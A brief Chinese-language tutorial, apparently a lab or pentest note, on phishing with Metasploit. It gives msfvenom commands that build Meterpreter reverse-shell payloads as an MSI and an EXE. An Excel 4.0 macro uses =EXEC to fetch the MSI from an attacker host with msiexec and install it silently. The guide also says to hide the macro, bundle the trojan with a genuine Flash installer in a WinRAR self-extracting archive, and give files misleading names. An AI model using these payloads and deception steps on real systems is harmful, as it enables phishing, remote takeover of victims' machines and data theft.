excel宏
msf生成恶意的msi文件
msfvenom -p windows/x64/meterpreter/reverse_tcp lhsot=192.168.85.129 lport=13666 -f msi -o diaoyu.msi
制作excel
选择插入宏表
=EXEC("msiexec /q /i http://192.168.85.129/diaoyu.msi")
再隐藏宏
将名字改为容易混淆的
python在具有恶意的msi的文件夹下开启http服务
启动msf监听
目标访问excel且启用宏功能时
获取shell
常规软件捆绑远控木马进行钓鱼
制作msf木马
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.85.129 LPORT=13333 -f exe -o flash.exe
把木马和正常的flash 进行压缩
放在一起用winrar添加到压缩文件
起一个容易混淆的名字
把做好的恶意flash放到win7虚拟机中运行
启动msf进行监听
win7 运行自解压后就获取到shell